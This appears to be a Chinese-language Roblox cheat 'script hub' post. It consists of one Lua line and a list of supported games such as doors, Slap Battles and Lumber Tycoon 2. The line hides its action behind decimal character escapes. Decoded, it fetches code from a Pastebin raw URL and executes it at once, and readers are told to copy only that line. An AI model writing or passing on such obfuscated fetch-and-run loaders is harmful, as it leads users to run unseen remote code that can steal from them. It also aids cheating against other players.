_G["康师傅作者晨"]="xdjhadgdsrfcyefjhsadcctyseyr6432478rudghfvszhxcaheey"loadstring("\108\111\97\100\115\116\114\105\110\103\40\103\97\109\101\58\72\116\116\112\71\101\116\40\34\104\116\116\112\115\58\47\47\112\97\115\116\101\98\105\110\46\99\111\109\47\114\97\119\47\98\116\48\57\105\101\101\122\34\41\41\40\41\10")()

支持游戏
--小黑子
--自然灾害
--doors
--最强战场
--俄亥俄
--巴掌大战
--忍者
--极速
--力量
--伐木大亨2
--彩虹好友
--生存巨人
--能力大战
--幸运方块战地
--最强拳击模拟器
--生存杀手
--杀手vs警长
--3008
--打墙模拟器
--逃出建筑
--在51区生存
--我的餐厅
--请复制前面的脚本不要复制文字